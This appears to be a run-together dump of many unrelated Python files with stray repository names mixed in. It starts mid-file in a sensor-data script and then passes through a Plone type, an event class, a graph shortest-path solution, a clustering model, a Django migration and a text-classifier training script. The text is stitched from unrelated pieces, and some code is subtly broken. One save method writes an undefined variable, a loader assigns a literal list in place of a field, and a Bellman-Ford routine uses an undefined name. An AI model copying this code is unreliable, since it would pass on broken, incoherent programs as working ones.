'T_ch_4': 2, 'T_ch_5': 2, 'T_ch_6': 2}) # dump data into csv files; do not output row index output_fname = output_dir + '/hyy16_sensor_data_20%s.csv' % run_date_str df_all_sensor.to_csv(output_fname, sep=',', na_rep='NaN', index=False) # daily plots for diagnosing wrong measurements if preproc_config.run_options['plot_sensor_data']: fig, axes = plt.subplots(3, 1, sharex=True, figsize=(8, 8)) time_in_hour = (df_all_sensor['doy'].values - doy) * 24. for col in ['PAR_ch_1', 'PAR_ch_2']: axes[0].plot(time_in_hour, df_all_sensor[col].values, label=col, lw=1.) axes[0].legend(loc='upper left', frameon=False, fontsize=10, ncol=2) for col in ['T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3']: axes[1].plot(time_in_hour, df_all_sensor[col].values, label=col, lw=1.) axes[1].legend(loc='upper left', frameon=False, fontsize=10, ncol=4) for col in ['T_ch_4', 'T_ch_5', 'T_ch_6']: axes[2].plot(time_in_hour, df_all_sensor[col].values, label=col, lw=1.) axes[2].legend(loc='upper left', frameon=False, fontsize=10, ncol=3) axes[0].set_ylabel('PAR ($\mu$mol m$^{-2}$ s$^{-1}$)') axes[1].set_ylabel('Temperature ($\degree$C)') axes[2].set_ylabel('Temperature ($\degree$C)') axes[2].set_xlim([0, 24]) axes[2].xaxis.set_ticks(range(0, 25, 3)) axes[2].set_xlabel('Hour (UTC+2)') fig.tight_layout() fig.savefig(output_dir + '/plots/hyy16_sensor_data_20%s.png' % run_date_str) fig.clf() del fig, axes if not args.flag_silent_mode: print( '\n%d lines converted from sensor data file(s) on the day 20%s.' % (df_all_sensor.shape[0], run_date_str)) print(df_all_sensor.describe().transpose()) del df_lc_sensor, df_sc_sensor, df_all_sensor # echo program ending dt_end = datetime.datetime.now() print(datetime.datetime.strftime(dt_end, '%Y-%m-%d %X')) print('Done. Finished in %.2f seconds.' % (dt_end - dt_start).total_seconds()) """ Definition of the Story dexterity content type """ from zope.interface import implementer from archive.content.interfaces.story import IStory from plone.dexterity.content import Container @implementer(IStory) class Story(Container): """ Archive Story Item """ from item import Item from time import strftime, gmtime import os import json from conceptmodel import ConceptModel class Event(Item): """ The Event class extends the Item class, and is the container for the events this application is trying to recommend to its users. NOTE: Events that have been manipulated using ConceptModel() have a `maturity` entry associated with their dictionary representation. This piece of information is not yet used for anything, but may prove helpful in the future. """ starttime = [] endtime = [] location = "" picture = "" url = "" def __init__(self, description="", starttime=[], endtime=[], location="", picture="", name="", url=""): super().__init__(description=description, name=name) self.starttime = starttime self.endtime = endtime self.location = location self.url = url self.picture = picture def loadEvent(self, name, filename="events.json"): if filename not in [f for f in os.listdir('.') if os.path.isfile(f)]: raise IOError("The item definitions file" + filename + " appears to be missing!") list_of_items = json.load(open(filename))['events'] for item in list_of_items: # print(name + '\n' + item['name']) if item['name'] != name: continue else: self.name = name self.description = item['description'] self.model = ConceptModel(model=item['model']['concepts']) self.start_time = item['starttime'] self.end_time = item['endtime'] self.location = item['location'] self.url = item['url'] self.picture = ['picture'] return raise IOError("The item " + name + "was not found!") def saveEvent(self, filename="events.json"): event_schema = { "name": self.name, "model": { "concepts": self.model.model, "maturity": self.model.maturity }, "description": self.description, "starttime": self.starttime, "endtime": self.endtime, "location": self.location, "url": self.url, "picture": self.picture } if filename not in [f for f in os.listdir('.') if os.path.isfile(f)]: new_file_schema = { "events": [event_schema] } f = open(filename, 'w') f.write(json.dumps(content, indent=4)) f.close() else: data = json.load(open(filename)) names = [event['name'] for event in data['events']] if self.name not in names: data['events'].append(event_schema) with open(filename, 'w') as outfile: json.dump(data, outfile, indent=4) if self.name in names: user_index = 0 for i in range(0, len(data['events'])): if data['events'][i]['name'] == self.name: user_index = i break data['events'][user_index] = event_schema with open(filename, 'w') as outfile: json.dump(data, outfile, indent=4) def deleteEvent(self, filename="events.json"): self.deleteItem(filename)class Solution: def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int: graph = defaultdict(list) for source, dest, time in times: graph[source].append((time, dest)) return self.bellmanford(graph, k, n) #return self.djikstra(graph, k, n) def djikstra(self, graph, start_node, total_nodes): max_time = 0 unvisited = [] # priority heap heappush(unvisited, (0, start_node)) costs = [float("inf") for _ in range(total_nodes+1)] costs[start_node] = 0 costs[0] = 0 while unvisited: time, source = heappop(unvisited) if costs[source] < time: # check if already better cost continue max_time = max(max_time, time) for dest_time, dest in graph[source]: cost = time + dest_time if costs[dest] > cost: # relax the edge costs[dest] = cost heappush(unvisited, (cost, dest)) for cost in costs: if cost == float("inf"): return -1 return max_time def bellmanford(self, graph, start_node, total_nodes): """ from: [[cost,to],[cost,to]] """ costs = [float(inf) for _ in range(total_nodes+1)] costs[start_node] = 0 costs[0] = 0 for i in range(1, total_nodes+1): for source in range(1, total_nodes+1): for cost, dest in graph[source]: new_dist = costs[source] + cost # relax the edge costs[dest] = min(costs[dest], new_dist) max_cost = max(costs) return -1 if max_cost == float(inf) else max_cost """ Module entrypoint """ from .translator import cli from . import global_vars """ Copyright (C) 2019-2020 University of Massachusetts Amherst. This file is part of “grinch” http://github.com/iesl/grinch Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import numpy as np import torch.nn from absl import logging from grinch.features import must_not_link_rule, must_link_rule class LinearAndRuleModel(torch.nn.Module): """A linear model w/ must and must-not link constraints.""" def __init__(self, init_w, init_b, init_rules, feat2id): super(LinearAndRuleModel, self).__init__() self.lin_weight = torch.nn.Parameter(torch.from_numpy(init_w)) self.bias = torch.nn.Parameter(torch.from_numpy(init_b)) self.rules = torch.from_numpy(init_rules) self.feat2id = feat2id self.aux = dict() def weight_for(self, feature_name): learned, fid = self.feat2id[feature_name] if learned: return self.lin_weight[fid], self.bias[fid] else: return self.rules[fid], None @staticmethod def from_encoding_model(encoding_model, init_w=None, init_b=None, init_rules=None): logging.info('Creating LinearAndRuleModel from encoding model %s ', encoding_model.name) feat2id = dict() next_learned_id = 0 next_rule_id = 0 for feat in encoding_model.feature_list: if feat.name in encoding_model.must_link_rules or feat.name in encoding_model.must_not_link_rules: feat2id[feat.name] = (False, next_rule_id) next_rule_id += 1 else: feat2id[feat.name] = (True, next_learned_id) next_learned_id += 1 if init_w is None: init_w = np.ones(len([k for k in feat2id if feat2id[k][0]]), dtype=np.float32) if init_b is None: init_b = np.ones_like(init_w) * 1e-4 if init_rules is None: init_rules = np.ones(len([k for k in feat2id if not feat2id[k][0]]), dtype=np.float32) for k, (is_learned, idx) in feat2id.items(): if k in encoding_model.must_link_rules: assert not is_learned init_rules[idx] = must_link_rule elif k in encoding_model.must_not_link_rules: assert not is_learned init_rules[idx] = must_not_link_rule else: assert is_learned model = LinearAndRuleModel(init_w, init_b, init_rules, feat2id) return model mottaquikarim/pydev-psets """ Exploratory Data Analysis II - Unique Values """ import numpy as np import pandas as pd wine_reviews = pd.read_csv('raw_data/winemag-data-130k.csv') # Print a list of all the unique countries in the wine_reviews DataFrame in alphabetical order. Also print the number of unique countries that exist in the dataset. Hint: Don't just find the length of your first result. #!/usr/bin/python3 # apt install -y python3-pip && pip3 install psutil import json, psutil res = {} res['cpu_count'] = psutil.cpu_count() res['memory_total'] = int(psutil.virtual_memory().total / 1024 / 1024) res['disk_total'] = int(psutil.disk_usage('/').total / 1024 / 1024 / 1024) res['cpu_percent'] = psutil.cpu_percent(1) res['memory_percent'] = psutil.virtual_memory().percent res['disk_percent'] = psutil.disk_usage('/').percent print(json.dumps(res)) packages/pyright-internal/src/tests/samples/import2.py # This sample tests import resolution for relative imports. from datetime import datetime # This should generate an error because relative imports can # be used only with the "from . import A" form. import .package1 as p0 from . import package1 as p1 a = p1.foo() from .package1 import foo b = foo() # This should generate an error because there is no # directory or file named package2. from . import package2 as p2 from .package1.sub import subfoo # subfoo should resolve to the package1/sub/__init__.py, # which returns a datetime. Verify that it does. c: datetime = subfoo() from .package1.psyche import psyche1 # This should resolve to package1/psyche.py even though # there is a package1/psyche directory present. d: int = psyche1() codeproject/DeepStackwindows_packages_gpu/torch/distributions/exp_family.py import torch from torch.distributions.distribution import Distribution class ExponentialFamily(Distribution): r""" ExponentialFamily is the abstract base class for probability distributions belonging to an exponential family, whose probability mass/density function has the form is defined below .. math:: p_{F}(x; \theta) = \exp(\langle t(x), \theta\rangle - F(\theta) + k(x)) where :math:`\theta` denotes the natural parameters, :math:`t(x)` denotes the sufficient statistic, :math:`F(\theta)` is the log normalizer function for a given family and :math:`k(x)` is the carrier measure. Note: This class is an intermediary between the `Distribution` class and distributions which belong to an exponential family mainly to check the correctness of the `.entropy()` and analytic KL divergence methods. We use this class to compute the entropy and KL divergence using the AD framework and Bregman divergences (courtesy of: and , Entropies and Cross-entropies of Exponential Families). """ @property def _natural_params(self): """ Abstract method for natural parameters. Returns a tuple of Tensors based on the distribution """ raise NotImplementedError def _log_normalizer(self, *natural_params): """ Abstract method for log normalizer function. Returns a log normalizer based on the distribution and input """ raise NotImplementedError @property def _mean_carrier_measure(self): """ Abstract method for expected carrier measure, which is required for computing entropy. """ raise NotImplementedError def entropy(self): """ Method to compute the entropy using Bregman divergence of the log normalizer. """ result = -self._mean_carrier_measure nparams = [p.detach().requires_grad_() for p in self._natural_params] lg_normal = self._log_normalizer(*nparams) gradients = torch.autograd.grad(lg_normal.sum(), nparams, create_graph=True) result += lg_normal for np, g in zip(nparams, gradients): result -= np * g return result # encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Boardfile' db.create_table('boarddocs_boardfile', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('covering', self.gf('django.db.models.fields.DateTimeField')()), )) db.send_create_signal('boarddocs', ['Boardfile']) # Adding model 'Annualreport' db.create_table('boarddocs_annualreport', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('startDate', self.gf('django.db.models.fields.DateField')()), ('endDate', self.gf('django.db.models.fields.DateField')()), )) db.send_create_signal('boarddocs', ['Annualreport']) # Adding model 'Budgetreport' db.create_table('boarddocs_budgetreport', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('startDate', self.gf('django.db.models.fields.DateField')()), ('endDate', self.gf('django.db.models.fields.DateField')()), )) db.send_create_signal('boarddocs', ['Budgetreport']) # Adding model 'Minutes' db.create_table('boarddocs_minutes', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('meetingDate', self.gf('django.db.models.fields.DateTimeField')()), )) db.send_create_signal('boarddocs', ['Minutes']) # Adding model 'Agenda' db.create_table('boarddocs_agenda', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('meetingDate', self.gf('django.db.models.fields.DateTimeField')()), )) db.send_create_signal('boarddocs', ['Agenda']) # Adding model 'Historical' db.create_table('boarddocs_historical', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), )) db.send_create_signal('boarddocs', ['Historical']) def backwards(self, orm): # Deleting model 'Boardfile' db.delete_table('boarddocs_boardfile') # Deleting model 'Annualreport' db.delete_table('boarddocs_annualreport') # Deleting model 'Budgetreport' db.delete_table('boarddocs_budgetreport') # Deleting model 'Minutes' db.delete_table('boarddocs_minutes') # Deleting model 'Agenda' db.delete_table('boarddocs_agenda') # Deleting model 'Historical' db.delete_table('boarddocs_historical') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'boarddocs.agenda': { 'Meta': {'object_name': 'Agenda'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'meetingDate': ('django.db.models.fields.DateTimeField', [], {}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.annualreport': { 'Meta': {'object_name': 'Annualreport'}, 'endDate': ('django.db.models.fields.DateField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'startDate': ('django.db.models.fields.DateField', [], {}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.boardfile': { 'Meta': {'object_name': 'Boardfile'}, 'covering': ('django.db.models.fields.DateTimeField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.budgetreport': { 'Meta': {'object_name': 'Budgetreport'}, 'endDate': ('django.db.models.fields.DateField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'startDate': ('django.db.models.fields.DateField', [], {}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.historical': { 'Meta': {'object_name': 'Historical'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.minutes': { 'Meta': {'object_name': 'Minutes'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'meetingDate': ('django.db.models.fields.DateTimeField', [], {}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['boarddocs'] 1-10 # !/usr/bin/env python # encoding: utf-8 # Copyright 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. """Sentence classifier""" import argparse import json import os import sys import subprocess import logging from collections import defaultdict from termcolor import colored import random import numpy as np import torch from blamepipeline import DATA_DIR as DATA_ROOT from blamepipeline.claimclass import SentClassifier from blamepipeline.claimclass import utils, config logger = logging.getLogger() # ------------------------------------------------------------------------------ # Training arguments. # ------------------------------------------------------------------------------ # Defaults DATA_DIR = os.path.join(DATA_ROOT, 'datasets') MODEL_DIR = os.path.join(DATA_ROOT, 'models/claimclass') EMBED_DIR = os.path.join(DATA_ROOT, 'embeddings') def str2bool(v): return v.lower() in ('yes', 'true', 't', '1', 'y') def add_train_args(parser): """Adds commandline arguments pertaining to training a model. These are different from the arguments dictating the model architecture. """ parser.register('type', 'bool', str2bool) # Runtime environment runtime = parser.add_argument_group('Environment') runtime.add_argument('--no-cuda', type='bool', default=False, help='Train on CPU, even if GPUs are available.') runtime.add_argument('--gpu', type=int, default=0, help='Run on a specific GPU') runtime.add_argument('--data-workers', type=int, default=0, help='Number of subprocesses for data loading') runtime.add_argument('--parallel', type='bool', default=False, help='Use DataParallel on all available GPUs') runtime.add_argument('--random-seed', type=int, default=712, help=('Random seed for all numpy/torch/cuda ' 'operations (for reproducibility)')) runtime.add_argument('--num-epochs', type=int, default=25, help='Train data iterations') runtime.add_argument('--batch-size', type=int, default=50, help='Batch size for training') runtime.add_argument('--test-batch-size', type=int, default=50, help='Batch size during validation/testing') # Files files = parser.add_argument_group('Filesystem') files.add_argument('--model-dir', type=str, default=MODEL_DIR, help='Directory for saved models/checkpoints/logs') files.add_argument('--model-name', type=str, default='', help='Unique model identifier (.mdl, .txt, .checkpoint)') files.add_argument('--data-dir', type=str, default=DATA_DIR, help='Directory of training/validation data') files.add_argument('--train-file', type=str, default=None, help='train file') files.add_argument('--dev-file', type=str, default=None, help='dev file') files.add_argument('--test-file', type=str, default=None, help='test file') files.add_argument('--embed-dir', type=str, default=EMBED_DIR, help='Directory of pre-trained embedding files') files.add_argument('--embedding-file', type=str, choices=['word2vec', 'glove'], default=None, help='Space-separated pretrained embeddings file') files.add_argument('--valid-size', type=float, default=0, help='validation set ratio') # General general = parser.add_argument_group('General') general.add_argument('--display-iter', type=int, default=100, help='Log state after every batches') general.add_argument('--metrics', type=str, choices=['precision', 'recall', 'F1', 'acc'], help='metrics to display when training', nargs='+', default=['precision', 'recall', 'F1', 'acc']) general.add_argument('--valid-metric', type=str, default='F1', help='The evaluation metric used for model selection') # debug debug = parser.add_argument_group('Debug') debug.add_argument('--debug', type='bool', default=False, help='Debug mode: only run 1/10 fold.') def set_defaults(args): """Make sure the commandline arguments are initialized properly.""" # Check critical files exist args.train_file = os.path.join(args.data_dir, args.train_file) if not os.path.isfile(args.train_file): raise IOError('No such file: %s' % args.train_file) if args.dev_file: args.dev_file = os.path.join(args.data_dir, args.dev_file) if not os.path.isfile(args.dev_file): raise IOError('No such file: %s' % args.dev_file) if args.test_file: args.test_file = os.path.join(args.data_dir, args.test_file) if not os.path.isfile(args.test_file): raise IOError('No such file: %s' % args.test_file) if args.embedding_file: args.embedding_file = 'w2v.googlenews.300d.txt' if args.embedding_file == 'word2vec' else 'glove.6B.300d.txt' args.embedding_file = os.path.join(args.embed_dir, args.embedding_file) if not os.path.isfile(args.embedding_file): raise IOError('No such file: %s' % args.embedding_file) # Set model directory subprocess.call(['mkdir', '-p', args.model_dir]) # Set model name if not args.model_name: import uuid import time args.model_name = time.strftime("%Y%m%d-") + str(uuid.uuid4())[:8] # Set log + model file names args.log_file = os.path.join(args.model_dir, args.model_name + '.txt') args.model_file = os.path.join(args.model_dir, args.model_name + '.mdl') # Embeddings options if args.embedding_file: with open(args.embedding_file) as f: dim = len(f.readline().strip().split(' ')) - 1 args.embedding_dim = dim elif not args.embedding_dim: raise RuntimeError('Either embedding_file or embedding_dim ' 'needs to be specified.') # Make sure fix_embeddings and embedding_file are consistent if args.fix_embeddings: if not args.embedding_file: logger.warning('WARN: fix_embeddings set to False ' 'as embeddings are random.') args.fix_embeddings = False return args # ------------------------------------------------------------------------------ # Initalization from scratch. # ------------------------------------------------------------------------------ def init_from_scratch(args, train_exs, dev_exs, test_exs): """New model, new data, new dictionary. """ # Build a dictionary from the data logger.info('-' * 100) logger.info('Build dictionary') word_dict = utils.build_word_dict(args, train_exs + dev_exs + test_exs) logger.info('Num words = %d' % len(word_dict)) # Initialize model model = SentClassifier(config.get_model_args(args), word_dict) # Load pretrained embeddings for words in dictionary if args.embedding_file: model.load_embeddings(word_dict.tokens(), args.embedding_file) return model # ------------------------------------------------------------------------------ # Train loop. # ------------------------------------------------------------------------------ def train(args, data_loader, model, global_stats): """Run through one epoch of model training with the provided data loader.""" # Initialize meters + timers train_loss = utils.AverageMeter() epoch_time = utils.Timer() # Run one epoch for idx, ex in enumerate(data_loader): loss, batch_size = model.update(ex) train_loss.update(loss, batch_size) # train_loss.update(*model.update(ex)) if idx % args.display_iter == 0: logger.info('train: Epoch = %d | iter = %d/%d | ' % (global_stats['epoch'], idx, len(data_loader)) + 'loss = %.2f | elapsed time = %.2f (s)' % (train_loss.avg, global_stats['timer'].time())) train_loss.reset() logger.info('train: Epoch %d done. Time for epoch = %.2f (s)' % (global_stats['epoch'], epoch_time.time())) # ------------------------------------------------------------------------------ # Validation loops. Includes functions that # use different metrics and implementations. # ------------------------------------------------------------------------------ def evaluate(pred, true, eps=1e-9): true_positive = (pred * true).sum().item() precision = true_positive / (pred.sum().item() + eps) recall = true_positive / (true.sum().item() + eps) F1 = 2 * (precision * recall) / (precision + recall + eps) acc = (pred == true).sum().item() / pred.size(0) return {'precision': precision, 'recall': recall, 'F1': F1, 'acc': acc} def validate(args, data_loader, model, global_stats, mode): """Run one full validation. """ eval_time = utils.Timer() # Make predictions examples = 0 preds = [] trues = [] for ex in data_loader: batch_size = ex[0].size(0) inputs = ex[:-1] pred = model.predict(inputs) true = ex[-1] preds.append(pred) trues.append(true) # If getting train accuracies, sample max 10k examples += batch_size if mode == 'train' and examples >= 1e4: break preds = torch.cat(preds, dim=0) trues = torch.cat(trues, dim=0) metrics = evaluate(preds, trues) logger.info(f'{mode} valid: Epoch = {global_stats["epoch"]} (best:{global_stats["best_epoch"]}) | ' + f'examples = {examples} | valid time = {eval_time.time():.2f} (s).') logger.info(' | '.join([f'{k}: {metrics[k]*100:.2f}%' for k in metrics])) return {args.valid_metric: metrics[args.valid_metric]} def train_valid_loop(train_loader, dev_loader, args, model, test_loader=None, fold=None): # -------------------------------------------------------------------------- # TRAIN/VALID LOOP logger.info('-' * 100) stats = {'timer': utils.Timer(), 'epoch': 0, 'best_valid': 0, 'best_epoch': 0} start_epoch = 0 for epoch in range(start_epoch, args.num_epochs): stats['epoch'] = epoch # Train train(args, train_loader, model, stats) # Validate train validate(args, train_loader, model, stats, mode='train') # Validate dev result = validate(args, dev_loader, model, stats, mode='dev') # Save best valid if result[args.valid_metric] > stats['best_valid']: logger.info( colored(f'Best valid: {args.valid_metric} = {result[args.valid_metric]*100:.2f}% ', 'yellow') + colored(f'(epoch {stats["epoch"]}, {model.updates} updates)', 'yellow')) fold_info = f'.fold_{fold}' if fold is not None else '' model.save(args.model_file + fold_info) stats['best_valid'] = result[args.valid_metric] stats['best_epoch'] = epoch logger.info('-' * 100) logger.info('Load best model...') model = SentClassifier.load(args.model_file + fold_info, args) device = torch.device(f"cuda:{args.gpu}" if args.cuda else "cpu") model.to(device) stats['epoch'] = stats['best_epoch'] if test_loader: test_result = validate(args, test_loader, model, stats, mode='test') else: test_result = validate(args, dev_loader, model, stats, mode=f'cv-{fold}') return test_result def initialize_model(train_exs, dev_exs, test_exs): # -------------------------------------------------------------------------- # MODEL logger.info('-' * 100) logger.info('Training model from scratch...') model = init_from_scratch(args, train_exs, dev_exs, test_exs) # Set up optimizer model.init_optimizer() # Use the GPU? device = torch.device(f"cuda:{args.gpu}" if args.cuda else "cpu") model.to(device) # Use multiple GPUs? if args.parallel: model.parallelize() return model # ------------------------------------------------------------------------------ # Main. # ------------------------------------------------------------------------------ def main(args): # -------------------------------------------------------------------------- # DATA logger.info('-' * 100) logger.info('Load data files') train_exs = utils.load_data(args.train_file) logger.info(f'Num train examples = {len(train_exs)}') if args.dev_file: dev_exs = utils.load_data(args.dev_file) logger.info(f'Num dev examples = {len(dev_exs)}') else: dev_exs = [] logger.info('No dev data. Randomly choose 10% of train data to validate.') if args.test_file: test_exs = utils.load_data(args.test_file) logger.info(f'Num test examples = {len(test_exs)}') else: test_exs = [] logger.info('No test data. Use 10 fold cv to evaluate.') logger.info(f'Total {len(train_exs) + len(dev_exs) + len(test_exs)} examples.') # ------------------------------------------------------------------------- # PRINT CONFIG logger.info('-' * 100) logger.info('CONFIG:\n%s' % json.dumps(vars(args), indent=4, sort_keys=True)) # -------------------------------------------------------------------------- # DATA ITERATORS logger.info('-' * 100) logger.info('Make data loaders') if args.test_file: model = initialize_model(train_exs, dev_exs, test_exs) train_loader, dev_loader, test_loader = utils.split_loader(train_exs, test_exs, args, model, dev_exs=dev_exs) result = train_valid_loop(train_loader, dev_loader, args, model, test_loader=test_loader)[args.valid_metric] logger.info('-' * 100) logger.info(f'Test {args.valid_metric}: {result*100:.2f}%') else: # 10-cross cv results = [] samples_fold = [np.random.randint(10) for _ in range(len(train_exs))] fold_samples = defaultdict(list) for sample_idx, sample_fold in enumerate(samples_fold): fold_samples[sample_fold].append(sample_idx) for fold in range(10): fold_info = f'for fold {fold}' if fold is not None else '' logger.info(colored(f'\nStarting training {fold_info}...\n', 'blue')) model = initialize_model(train_exs, dev_exs, test_exs) train_loader, dev_loader = utils.split_loader_cv( train_exs, args, model, fold_samples[fold], weighted=args.weighted_sampling) result = train_valid_loop(train_loader, dev_loader, args, model, fold=fold) results.append(result[args.valid_metric]) if args.debug: # DEBUG logger.debug(colored('DEBUG: Run for 1 folds. Stop.', 'red')) break result = np.mean(results).item() logger.info('-' * 100) logger.info(f'CV {args.valid_metric}: {result*100:.2f}%') if __name__ == '__main__': # Parse cmdline args and setup environment parser = argparse.ArgumentParser( 'Sentence Classifier', formatter_class=argparse.ArgumentDefaultsHelpFormatter ) add_train_args(parser) config.add_model_args(parser) args = parser.parse_args() set_defaults(args) # Set cuda args.cuda = not args.no_cuda and torch.cuda.is_available() # Set random state random.seed(args.random_seed) np.random.seed(args.random_seed) torch.manual_seed(args.random_seed) # this will **slower** the speed a lot, but enforce deterministic result for CNN model # torch.backends.cudnn.enabled = False # Set logging logger.setLevel(logging.DEBUG) fmt = logging.Formatter('%(asctime)s: [ %(message)s ]', '%m/%d/%Y %I:%M:%S %p') console = logging.StreamHandler() console.setFormatter(fmt) logger.addHandler(console) if args.log_file: logfile = logging.FileHandler(args.log_file, 'w') logfile.setFormatter(fmt) logger.addHandler(logfile) logger.info('COMMAND: %s' % ' '.join(sys.argv)) # Run! main(args) DanielTal87/Football-Management-Tool0 